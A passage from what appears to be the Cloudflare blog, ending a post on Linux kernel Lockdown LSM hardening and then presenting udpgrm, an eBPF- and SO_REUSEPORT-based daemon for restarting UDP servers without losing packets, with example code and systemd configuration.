is the most restrictive mode, where Lockdown will also try to prevent any information leakage from the kernel. In practice this may be too restrictive for server workloads as it blocks all runtime debugging capabilities, like perf
or eBPF.
Let’s see the Lockdown LSM in action. On a barebones Debian system the initial state is none
meaning nothing is locked down:
\n
ignat@dev:~$ uname -a\nLinux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux\nignat@dev:~$ cat /sys/kernel/security/lockdown\n[none] integrity confidentiality
\n
We can switch the system into the integrity
mode:
\n
ignat@dev:~$ echo integrity | sudo tee /sys/kernel/security/lockdown\nintegrity\nignat@dev:~$ cat /sys/kernel/security/lockdown\nnone [integrity] confidentiality
\n
It is worth noting that we can only put the system into a more restrictive state, but not back. That is, once in integrity
mode we can only switch to confidentiality
mode, but not back to none
:
\n
ignat@dev:~$ echo none | sudo tee /sys/kernel/security/lockdown\nnone\ntee: /sys/kernel/security/lockdown: Operation not permitted
\n
Now we can see that even on a stock Debian kernel, which, as we discovered above, does not enforce module signatures by default, we can no longer load a potentially malicious unsigned kernel module:
\n
ignat@dev:~$ sudo insmod mymod/mymod.ko\ninsmod: ERROR: could not insert module mymod/mymod.ko: Operation not permitted
\n
And the kernel log will helpfully point out that this is due to Lockdown LSM:
\n
ignat@dev:~$ sudo dmesg | tail -n 1\n[21728.820129] Lockdown: insmod: unsigned module loading is restricted; see man kernel_lockdown.7
\n
As we can see, the Lockdown LSM helps tighten the security of a kernel that otherwise may not have other enforcing bits enabled, like the stock Debian one.
If you compile your own kernel, you can go one step further and set the initial state of the Lockdown LSM to be more restrictive than none from the start. This is exactly what we did for the Cloudflare production kernel:
\n
ignat@dev:~$ grep LOCK_DOWN /boot/config-6.6.17-cloudflare-2024.2.9\n# CONFIG_LOCK_DOWN_KERNEL_FORCE_NONE is not set\nCONFIG_LOCK_DOWN_KERNEL_FORCE_INTEGRITY=y\n# CONFIG_LOCK_DOWN_KERNEL_FORCE_CONFIDENTIALITY is not set
\n \n \n
In this post we reviewed some useful Linux kernel security configuration options we use at Cloudflare. This is only a small subset, and there are many more available and even more are being constantly developed, reviewed, and improved by the Linux kernel community. We hope that this post will shed some light on these security features and that, if you haven’t already, you may consider enabling them in your Linux systems.
\n
2025-05-07
8 min read
At Cloudflare, we do everything we can to avoid interruption to our services. We frequently deploy new versions of the code that delivers the services, so we need to be able to restart the server processes to upgrade them without missing a beat. In particular, performing graceful restarts (also known as “zero downtime”) for UDP servers has proven to be surprisingly difficult.
We’ve previously written about graceful restarts in the context of TCP, which is much easier to handle. We didn’t have a strong reason to deal with UDP until recently, when protocols like HTTP/3 and QUIC became critical. This blog post introduces udpgrm, a lightweight daemon that helps us upgrade UDP servers without dropping a single packet.
Here’s the udpgrm GitHub repo.
In the early days of the Internet, UDP was used for stateless request/response communication with protocols like DNS or NTP. Restarts of a server process are not a problem in that context, because it does not have to retain state across multiple requests. However, modern protocols like QUIC, WireGuard, and SIP, as well as online games, use stateful flows. So what happens to the state associated with a flow when a server process is restarted? Typically, old connections are just dropped during a server restart. Migrating the flow state from the old instance to the new instance is possible, but it is complicated and notoriously hard to get right.
The same problem occurs for TCP connections, but there a common approach is to keep the old instance of the server process running alongside the new instance for a while, routing new connections to the new instance while letting existing ones drain on the old. Once all connections finish or a timeout is reached, the old instance can be safely shut down. The same approach works for UDP, but it requires more involvement from the server process than for TCP.
In the past, we described the established-over-unconnected method. It offers one way to implement flow handoff, but it comes with significant drawbacks: it’s prone to race conditions in protocols with multi-packet handshakes, and it suffers from a scalability issue. Specifically, the kernel hash table used for dispatching packets is keyed only by the local IP:port tuple, which can lead to bucket overfill when dealing with many inbound UDP sockets.
Now we have found a better method, leveraging Linux’s SO_REUSEPORT
API. By placing both old and new sockets into the same REUSEPORT group and using an eBPF program for flow tracking, we can route packets to the correct instance and preserve flow stickiness. This is how udpgrm works.
Before diving deeper, let’s quickly review the basics. Linux provides the SO_REUSEPORT
socket option, typically set after socket()
but before bind()
. Please note that this has a separate purpose from the better known SO_REUSEADDR
socket option.
SO_REUSEPORT
allows multiple sockets to bind to the same IP:port tuple. This feature is primarily used for load balancing, letting servers spread traffic efficiently across multiple CPU cores. You can think of it as a way for an IP:port to be associated with multiple packet queues. In the kernel, sockets sharing an IP:port this way are organized into a reuseport group — a term we’ll refer to frequently throughout this post.
┌───────────────────────────────────────────┐
│ reuseport group 192.0.2.0:443 │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ │
│ │ socket #1 │ │ socket #2 │ │ socket #3 │ │
│ └───────────┘ └───────────┘ └───────────┘ │
└───────────────────────────────────────────┘
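As a minimal sketch of the mechanics (plain sockets, not udpgrm code), two UDP sockets can join the same reuseport group as long as each one sets SO_REUSEPORT before bind():
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>

static int reuseport_socket(const char *ip, int port)
{
	int sd = socket(AF_INET, SOCK_DGRAM, 0);
	if (sd < 0) { perror("socket"); exit(1); }

	int one = 1;
	/* Must be set before bind() so the socket can join the group. */
	if (setsockopt(sd, SOL_SOCKET, SO_REUSEPORT, &one, sizeof(one)) < 0) {
		perror("setsockopt(SO_REUSEPORT)");
		exit(1);
	}

	struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(port) };
	inet_pton(AF_INET, ip, &addr.sin_addr);
	if (bind(sd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		perror("bind");
		exit(1);
	}
	return sd;
}

int main(void)
{
	/* Both binds succeed; the kernel now spreads inbound packets between them. */
	int a = reuseport_socket("127.0.0.1", 5201);
	int b = reuseport_socket("127.0.0.1", 5201);
	printf("sockets %d and %d share 127.0.0.1:5201\n", a, b);
	close(a);
	close(b);
	return 0;
}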
Linux supports several methods for distributing inbound packets across a reuseport group. By default, the kernel uses a hash of the packet’s 4-tuple to select a target socket. Another method is SO_INCOMING_CPU
, which, when enabled, tries to steer packets to sockets running on the same CPU that received the packet. This approach works but has limited flexibility.
To provide more control, Linux introduced the SO_ATTACH_REUSEPORT_CBPF
option, allowing server processes to attach a classic BPF (cBPF) program to make socket selection decisions. This was later extended with SO_ATTACH_REUSEPORT_EBPF
, enabling the use of modern eBPF programs. With eBPF, developers can implement arbitrary custom logic. A boilerplate program would look like this:
SEC("sk_reuseport")
int udpgrm_reuseport_prog(struct sk_reuseport_md *md)
{
uint64_t socket_identifier = xxxx;
bpf_sk_select_reuseport(md, &sockhash, &socket_identifier, 0);
return SK_PASS;
}
To select a specific socket, the eBPF program calls bpf_sk_select_reuseport
, using a reference to a map with sockets (SOCKHASH
, SOCKMAP
, or the older, mostly obsolete SOCKARRAY
), along with a key or index. For example, a declaration of a SOCKHASH
might look like this:
struct {
__uint(type, BPF_MAP_TYPE_SOCKHASH);
__uint(max_entries, MAX_SOCKETS);
__uint(key_size, sizeof(uint64_t));
__uint(value_size, sizeof(uint64_t));
} sockhash SEC(".maps");
This SOCKHASH
is a hash map that holds references to sockets, even though the value size looks like a scalar 8-byte value. In our case it’s indexed by a uint64_t
key. This is pretty neat, as it allows for a simple number-to-socket mapping!
However, there’s a catch: the SOCKHASH
must be populated and maintained from user space (or a separate control plane), outside the eBPF program itself. Keeping this socket map accurate and in sync with the server process state is surprisingly difficult to get right — especially under dynamic conditions like restarts, crashes, or scaling events. The point of udpgrm is to take care of this stuff, so that server processes don’t have to.
Socket generation and working generation
Let’s look at how graceful restarts for UDP flows are achieved in udpgrm. To reason about this setup, we’ll need a bit of terminology: A socket generation is a set of sockets within a reuseport group that belong to the same logical application instance:
┌───────────────────────────────────────────────────┐
│ reuseport group 192.0.2.0:443 │
│ ┌─────────────────────────────────────────────┐ │
│ │ socket generation 0 │ │
│ │ ┌───────────┐ ┌───────────┐ ┌───────────┐ │ │
│ │ │ socket #1 │ │ socket #2 │ │ socket #3 │ │ │
│ │ └───────────┘ └───────────┘ └───────────┘ │ │
│ └─────────────────────────────────────────────┘ │
│ ┌─────────────────────────────────────────────┐ │
│ │ socket generation 1 │ │
│ │ ┌───────────┐ ┌───────────┐ ┌───────────┐ │ │
│ │ │ socket #4 │ │ socket #5 │ │ socket #6 │ │ │
│ │ └───────────┘ └───────────┘ └───────────┘ │ │
│ └─────────────────────────────────────────────┘ │
└───────────────────────────────────────────────────┘
When a server process needs to be restarted, the new version creates a new socket generation for its sockets. The old version keeps running alongside the new one, using sockets from the previous socket generation.
Reuseport eBPF routing boils down to two problems:
-
For new flows, we should choose a socket from the socket generation that belongs to the active server instance.
-
For already established flows, we should choose the appropriate socket — possibly from an older socket generation — to keep the flows sticky. The flows will eventually drain away, allowing the old server instance to shut down.
Easy, right?
Of course not! The devil is in the details. Let’s take it one step at a time.
Routing new flows is relatively easy. udpgrm simply maintains a reference to the socket generation that should handle new connections. We call this reference the working generation. Whenever a new flow arrives, the eBPF program consults the working generation pointer and selects a socket from that generation.
┌──────────────────────────────────────────────┐
│ reuseport group 192.0.2.0:443 │
│ ... │
│ Working generation ────┐ │
│ V │
│ ┌───────────────────────────────┐ │
│ │ socket generation 1 │ │
│ │ ┌───────────┐ ┌──────────┐ │ │
│ │ │ socket #4 │ │ ... │ │ │
│ │ └───────────┘ └──────────┘ │ │
│ └───────────────────────────────┘ │
│ ... │
└──────────────────────────────────────────────┘
For this to work, we first need to be able to differentiate packets belonging to new connections from packets belonging to old connections. This is very tricky and highly dependent on the specific UDP protocol. For example, QUIC has an initial packet concept, similar to a TCP SYN, but other protocols might not.
There needs to be some flexibility here, so udpgrm makes it configurable: each reuseport group is assigned a specific flow dissector.
A flow dissector has two tasks:
-
It distinguishes new packets from packets belonging to old, already established flows.
-
For recognized flows, it tells udpgrm which specific socket the flow belongs to.
These concepts are closely related and depend on the specific server. Different UDP protocols define flows differently. For example, a naive UDP server might use a typical 5-tuple to define flows, while QUIC uses a “connection ID” field in the QUIC packet header to survive NAT rebinding.
udpgrm supports three flow dissectors out of the box and is highly configurable to support any UDP protocol. More on this later.
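To tie the two routing paths together, here is a hedged sketch in the spirit of the boilerplate shown earlier. This is not udpgrm’s actual program; the map names, the use of the kernel-provided 4-tuple hash as the flow key, and the fallback logic are simplifying assumptions. It looks up an established flow first, and falls back to the working generation for new flows.
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

struct {
	__uint(type, BPF_MAP_TYPE_SOCKHASH);
	__uint(max_entries, 1024);
	__uint(key_size, sizeof(__u64));
	__uint(value_size, sizeof(__u64));
} sockets SEC(".maps");

struct {
	__uint(type, BPF_MAP_TYPE_HASH);
	__uint(max_entries, 65536);
	__type(key, __u32);   /* flow key: kernel-provided 4-tuple hash */
	__type(value, __u64); /* socket identifier of the owning instance */
} flow_table SEC(".maps");

struct {
	__uint(type, BPF_MAP_TYPE_ARRAY);
	__uint(max_entries, 1);
	__type(key, __u32);
	__type(value, __u64); /* socket identifier of the working generation */
} working_gen SEC(".maps");

SEC("sk_reuseport")
int select_socket(struct sk_reuseport_md *md)
{
	__u32 flow_key = md->hash;
	__u64 *sk_id = bpf_map_lookup_elem(&flow_table, &flow_key);

	if (!sk_id) {
		/* New flow: route it to the currently active server instance. */
		__u32 zero = 0;
		sk_id = bpf_map_lookup_elem(&working_gen, &zero);
		if (!sk_id)
			return SK_DROP;
	}

	__u64 key = *sk_id;
	if (bpf_sk_select_reuseport(md, &sockets, &key, 0) != 0)
		return SK_DROP;
	return SK_PASS;
}

char LICENSE[] SEC("license") = "GPL";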
Now that we covered the theory, we’re ready for the business: please welcome udpgrm — UDP Graceful Restart Marshal! udpgrm is a stateful daemon that handles all the complexities of the graceful restart process for UDP. It installs the appropriate eBPF REUSEPORT program, maintains flow state, communicates with the server process during restarts, and reports useful metrics for easier debugging.
We can describe udpgrm from two perspectives: for administrators and for programmers.
udpgrm daemon for the system administrator
udpgrm is a stateful daemon. To run it:
$ sudo udpgrm --daemon
[ ] Loading BPF code
[ ] Pinning bpf programs to /sys/fs/bpf/udpgrm
[*] Tailing message ring buffer map_id 936146
This sets up the basic functionality, prints rudimentary logs, and should be deployed as a dedicated systemd service — loaded after networking. However, this is not enough to fully use udpgrm. udpgrm needs to hook into getsockopt
, setsockopt
, bind
, and sendmsg
syscalls, which are scoped to a cgroup. You can install the udpgrm hooks like this:
$ sudo udpgrm --install=/sys/fs/cgroup/system.slice
But a more common pattern is to install it within the current cgroup:
$ sudo udpgrm --install --self
Better yet, use it as part of the systemd “service” config:
[Service]
...
ExecStartPre=/usr/local/bin/udpgrm --install --self
Once udpgrm is running, the administrator can use the CLI to list reuseport groups, sockets, and metrics, like this:
$ sudo udpgrm list
[ ] Retrievieng BPF progs from /sys/fs/bpf/udpgrm
192.0.2.0:4433
netns 0x1 dissector bespoke digest 0xdead
socket generations:
gen 3 0x17a0da <= app 0 gen 3
metrics:
rx_processed_total 13777528077
...
Now, with both the udpgrm daemon running and the cgroup hooks set up, we can focus on the server part.
udpgrm for the programmer
We expect the server to create the appropriate UDP sockets by itself. We depend on SO_REUSEPORT
, so that each server instance can have a dedicated socket or a set of sockets:
sd = socket.socket(AF_INET, SOCK_DGRAM, 0)
sd.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)
sd.bind(("192.0.2.1", 5201))
With a socket descriptor handy, we can pursue the udpgrm magic dance. The server communicates with the udpgrm daemon using setsockopt
calls. Behind the scenes, udpgrm provides eBPF setsockopt
and getsockopt
hooks and hijacks specific calls. It’s not easy to set up on the kernel side, but when it works, it’s truly awesome. A typical socket setup looks like this:
try:
work_gen = sd.getsockopt(IPPROTO_UDP, UDP_GRM_WORKING_GEN)
except OSError:
raise OSError('Is udpgrm daemon loaded? Try "udpgrm --self --install"')
sd.setsockopt(IPPROTO_UDP, UDP_GRM_SOCKET_GEN, work_gen + 1)
for i in range(10):
v = sd.getsockopt(IPPROTO_UDP, UDP_GRM_SOCKET_GEN, 8);
sk_gen, sk_idx = struct.unpack('II', v)
if sk_idx != 0xffffffff:
break
time.sleep(0.01 * (2 ** i))
else:
raise OSError("Communicating with udpgrm daemon failed.")
sd.setsockopt(IPPROTO_UDP, UDP_GRM_WORKING_GEN, work_gen + 1)
You can see three blocks here:
-
First, we retrieve the working generation number and, by doing so, check for udpgrm presence. Typically, udpgrm absence is fine for non-production workloads.
-
Then we register the socket to an arbitrary socket generation. We choose
work_gen + 1
as the value and verify that the registration went through correctly. -
Finally, we bump the working generation pointer.
That’s it! Hopefully, the API presented here is clear and reasonable. Under the hood, the udpgrm daemon installs the REUSEPORT eBPF program, sets up internal data structures, collects metrics, and manages the sockets in a SOCKHASH
.
Advanced socket creation with udpgrm_activate.py
In practice, we often need sockets bound to low ports like :443
, which requires elevated privileges like CAP_NET_BIND_SERVICE
. It’s usually better to configure listening sockets outside the server itself. A typical pattern is to pass the listening sockets using socket activation.
Sadly, systemd cannot create a new set of UDP SO_REUSEPORT
sockets for each server instance. To overcome this limitation, udpgrm provides a script called udpgrm_activate.py
, which can be used like this:
[Service]
Type=notify # Enable access to fd store
NotifyAccess=all # Allow access to fd store from ExecStartPre
FileDescriptorStoreMax=128 # Limit of stored sockets must be set
ExecStartPre=/usr/local/bin/udpgrm_activate.py test-port 0.0.0.0:5201
Here, udpgrm_activate.py
binds to 0.0.0.0:5201
and stores the created socket in the systemd FD store under the name test-port
. The server echoserver.py
will inherit this socket and receive the usual socket activation environment variables (LISTEN_FDS, LISTEN_FDNAMES, and LISTEN_PID), following the typical systemd socket activation pattern.
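For reference, the socket activation contract the server relies on is small: inherited descriptors start at fd 3 and are described by those environment variables. A minimal C sketch of the consuming side (the examples ship a Python echo server; this is just an illustration of the convention) looks like this:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define SD_LISTEN_FDS_START 3 /* first fd passed by systemd */

int main(void)
{
	const char *pid_s = getenv("LISTEN_PID");
	const char *fds_s = getenv("LISTEN_FDS");
	const char *names = getenv("LISTEN_FDNAMES"); /* e.g. "test-port" */

	/* The variables are only meant for us if LISTEN_PID matches our pid. */
	if (!pid_s || !fds_s || atoi(pid_s) != (int)getpid()) {
		fprintf(stderr, "no sockets passed by systemd\n");
		return 1;
	}

	int nfds = atoi(fds_s);
	for (int i = 0; i < nfds; i++) {
		int fd = SD_LISTEN_FDS_START + i;
		printf("inherited socket fd %d (names: %s)\n", fd, names ? names : "");
		/* A UDP server would now recvfrom()/sendto() on this fd. */
	}
	return 0;
}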
Systemd typically can’t handle more than one server instance running at the same time. It prefers to kill the old instance quickly. It supports the “at most one” server instance model, not the “at least one” model that we want. To work around this, udpgrm provides a decoy script that will exit when systemd asks it to, while the actual old instance of the server can stay active in the background.
[Service]
...
ExecStart=/usr/local/bin/mmdecoy examples/echoserver.py
Restart=always # if pid dies, restart it.
KillMode=process # Kill only decoy, keep children after stop.
KillSignal=SIGTERM # Make signals explicit
At this point, we have shown a full template for a udpgrm-enabled server that contains all three elements: udpgrm --install --self
for cgroup hooks, udpgrm_activate.py
for socket creation, and mmdecoy
for fooling systemd service lifetime checks.
[Service]
Type=notify # Enable access to fd store
NotifyAccess=all # Allow access to fd store from ExecStartPre
FileDescriptorStoreMax=128 # Limit of stored sockets must be set
ExecStartPre=/usr/local/bin/udpgrm --install --self
ExecStartPre=/usr/local/bin/udpgrm_activate.py --no-register test-port 0.0.0.0:5201
ExecStart=/usr/local/bin/mmdecoy PWD/examples/echoserver.py
Restart=always # if pid dies, restart it.
KillMode=process # Kill only decoy, keep children after stop.
KillSignal=SIGTERM # Make signals explicit
We’ve discussed the udpgrm daemon, the udpgrm setsockopt API, and systemd integration, but we haven’t yet covered the details of routing logic for old flows. To handle arbitrary protocols, udpgrm supports three dissector modes out of the box:
DISSECTOR_FLOW: udpgrm maintains a flow table indexed by a flow hash computed from a typical 4-tuple. It stores a target socket identifier for each flow. The flow table size is fixed, so there is a limit to the number of concurrent flows supported by this mode. To mark a flow as “assured,” udpgrm hooks into the sendmsg
syscall and saves the flow in the table only when a message is sent.
DISSECTOR_CBPF: A cookie-based model where the target socket identifier — called a udpgrm cookie — is encoded in each incoming UDP packet. For example, in QUIC, this identifier can be stored as part of the connection ID. The dissection logic is expressed as cBPF code. This model does not require a flow table in udpgrm but is harder to integrate because it needs protocol and server support.
DISSECTOR_NOOP: A no-op mode with no state tracking at all. It is useful for traditional UDP services like DNS, where we want to avoid losing even a single packet during an upgrade.
Finally, udpgrm provides a template for a more advanced dissector called DISSECTOR_BESPOKE. Currently, it includes a QUIC dissector that can decode the QUIC TLS SNI and direct specific TLS hostnames to specific socket generations.
For more details, please consult the udpgrm README. In short: the FLOW dissector is the simplest one, useful for older protocols. The CBPF dissector is good for experimentation when the protocol allows storing a custom connection ID (cookie); we used it to develop our own QUIC Connection ID schema (also named DCID), but it’s slow, because it interprets cBPF inside eBPF (yes, really!). NOOP is useful, but only for very specific niche servers. The real magic is in the BESPOKE type, where users can create arbitrary, fast, and powerful dissector logic.
The adoption of QUIC and other UDP-based protocols means that gracefully restarting UDP servers is becoming an increasingly important problem. To our knowledge, a reusable, configurable, and easy-to-use solution did not exist before. The udpgrm project brings together several novel ideas: a clean API using setsockopt()
, careful socket-stealing logic hidden under the hood, powerful and expressive configurable dissectors, and well-thought-out integration with systemd.
While udpgrm is intended to be easy to use, it hides a lot of complexity and solves a genuinely hard problem. The core issue is that the Linux Sockets API has not kept up with the modern needs of UDP.
Ideally, most of this should really be a feature of systemd. That includes supporting the “at least one” server instance mode, UDP SO_REUSEPORT
socket creation, installing a REUSEPORT_EBPF
program, and managing the “working generation” pointer. We hope that udpgrm helps create the space and vocabulary for these long-term improvements.